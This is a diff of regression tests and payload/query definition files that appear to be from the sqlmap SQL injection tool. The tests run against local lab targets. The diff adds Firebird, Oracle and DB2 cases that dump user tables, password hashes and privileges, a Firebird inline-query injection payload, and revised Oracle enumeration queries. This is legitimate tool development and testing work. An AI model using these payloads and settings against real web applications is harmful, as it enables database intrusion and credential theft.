|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: Generic UNION query (NULL) - 3 columns"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Firebird time-based single-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int_nooutput.php?id=1"/>
|
||||||
|
<tech value="T"/>
|
||||||
|
<level value="4"/>
|
||||||
|
<risk value="2"/>
|
||||||
|
<timeSec value="2"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: Firebird AND time-based blind (heavy query)"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Firebird inline queries multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int_inline.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="Q"/>
|
||||||
|
<level value="2"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: Firebird inline queries"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
<!-- End of common enumeration switches across all techniques -->
|
<!-- End of common enumeration switches across all techniques -->
|
||||||
|
|
||||||
<!-- Custom enumeration switches -->
|
<!-- Custom enumeration switches -->
|
||||||
|
|
@ -1044,6 +1255,21 @@
|
||||||
<item value="r'Database: SYS.+Table: USERS.+5 entries.+the | iss.+<blank> | mei'"/>
|
<item value="r'Database: SYS.+Table: USERS.+5 entries.+the | iss.+<blank> | mei'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
<case name="IBM DB2 boolean-based multi-threaded custom enumeration - substring">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/db2/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<db value="db2inst1"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<firstChar value="3"/>
|
||||||
|
<lastChar value="5"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: DB2INST1.+Table: USERS.+5 entries.+the | iss.+NULL | mei'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
<case name="SQLite UNION query multi-threaded custom enumeration">
|
<case name="SQLite UNION query multi-threaded custom enumeration">
|
||||||
<switches>
|
<switches>
|
||||||
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
||||||
|
|
@ -1671,6 +1897,294 @@
|
||||||
<item value="r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'"/>
|
<item value="r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - tables given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
<tbl value="user,aux,wrong"/>
|
||||||
|
<answer value="do you want to dump tables=N,do you want to crack them via a dictionary-based attack=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - tables given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
<tbl value="user,aux,wrong"/>
|
||||||
|
<answer value="do you want to crack them via a dictionary-based attack=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
|
||||||
|
<item value="r'.+5 entries.+wu.+nameisnull'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - tables given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
<tbl value="user,aux,wrong"/>
|
||||||
|
<answer value="do you want to crack them via a dictionary-based attack=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
|
||||||
|
<item value="r'.+5 entries.+wu.+nameisnull'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - tables without given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - tables without given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - tables without given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - column without given db or table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<col value="surname,foobar"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - column without given db or table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<col value="surname,foobar"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - column without given db or table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<col value="surname,foobar"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - column given databases">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - column given databases">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - column given databases">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - column given tables">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - column given tables">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - column given tables">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - column given databases and table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - column given databases and table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - column given databases and table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: add IBM DB2 test cases -->
|
||||||
<case name="SQLite multi-threaded search enumeration - database">
|
<case name="SQLite multi-threaded search enumeration - database">
|
||||||
<switches>
|
<switches>
|
||||||
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
||||||
|
|
@ -1845,6 +2359,73 @@
|
||||||
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded custom SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users WHERE ROWNUM=1.+1, luther, blisset'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded custom SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users WHERE ROWNUM=1 \[.+1.+luther'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded custom SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users WHERE ROWNUM=1 \[1\].+1, luther, blisset'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded custom ordered SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<query value="SELECT * FROM users ORDER BY name"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded custom ordered SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<query value="SELECT * FROM users ORDER BY name"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded custom ordered SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<query value="SELECT * FROM users ORDER BY name"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: add IBM DB2 test cases -->
|
||||||
<case name="SQLite boolean-based multi-threaded custom SQL query enumeration">
|
<case name="SQLite boolean-based multi-threaded custom SQL query enumeration">
|
||||||
<switches>
|
<switches>
|
||||||
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
||||||
|
|
@ -1886,7 +2467,6 @@
|
||||||
<query value="SELECT * FROM users ORDER BY name"/>
|
<query value="SELECT * FROM users ORDER BY name"/>
|
||||||
</switches>
|
</switches>
|
||||||
<parse>
|
<parse>
|
||||||
<!-- NOTE: it is not sorted on purpose because UNION does not play well with ORDER BY and it is stripped -->
|
|
||||||
<item value="r'SELECT \* FROM users ORDER BY name \[4\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
<item value="r'SELECT \* FROM users ORDER BY name \[4\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
|
|
||||||
|
|
@ -1996,6 +1996,24 @@ Formats:
|
||||||
<dbms>SQLite</dbms>
|
<dbms>SQLite</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
<test>
|
||||||
|
<title>Firebird inline queries</title>
|
||||||
|
<stype>6</stype>
|
||||||
|
<level>2</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3,8</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>[QUERY]</vector>
|
||||||
|
<request>
|
||||||
|
<payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Firebird</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
<!-- End of inline queries tests -->
|
<!-- End of inline queries tests -->
|
||||||
|
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -209,7 +209,7 @@
|
||||||
<length query="LENGTH(%s)"/>
|
<length query="LENGTH(%s)"/>
|
||||||
<isnull query="NVL(%s,' ')"/>
|
<isnull query="NVL(%s,' ')"/>
|
||||||
<delimiter query="||"/>
|
<delimiter query="||"/>
|
||||||
<limit query="ROWNUM AS LIMIT %s ORDER BY 1 ASC) WHERE LIMIT"/>
|
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||||
<limitgroupstart/>
|
<limitgroupstart/>
|
||||||
<limitgroupstop/>
|
<limitgroupstop/>
|
||||||
|
|
@ -269,8 +269,8 @@
|
||||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
|
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
|
||||||
</tables>
|
</tables>
|
||||||
<columns>
|
<columns>
|
||||||
<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
|
||||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND OWNER='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
|
||||||
</columns>
|
</columns>
|
||||||
<dump_table>
|
<dump_table>
|
||||||
<inband query="SELECT %s FROM %s"/>
|
<inband query="SELECT %s FROM %s"/>
|
||||||
|
|
@ -359,12 +359,12 @@
|
||||||
<substring query="MID((%s),%d,%d)"/>
|
<substring query="MID((%s),%d,%d)"/>
|
||||||
<concatenate query="%s&%s"/>
|
<concatenate query="%s&%s"/>
|
||||||
<case query="SELECT (IIF(%s,1,0))"/>
|
<case query="SELECT (IIF(%s,1,0))"/>
|
||||||
|
<inference query="ASCW(MID((%s),%d,1)) > %d"/>
|
||||||
<banner/>
|
<banner/>
|
||||||
<!--CURRENTUSER() is not available outside the MS Access query tool itself-->
|
<!--CURRENTUSER() is not available outside the MS Access query tool itself-->
|
||||||
<current_user/>
|
<current_user/>
|
||||||
<current_db/>
|
<current_db/>
|
||||||
<hostname/>
|
<hostname/>
|
||||||
<inference query="ASCW(MID((%s),%d,1)) > %d"/>
|
|
||||||
<is_dba/>
|
<is_dba/>
|
||||||
<dbs/>
|
<dbs/>
|
||||||
<!--MSysObjects have no read permission by default-->
|
<!--MSysObjects have no read permission by default-->
|
||||||
|
|
@ -401,16 +401,16 @@
|
||||||
<substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
|
<substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
|
||||||
<concatenate query="%s||%s"/>
|
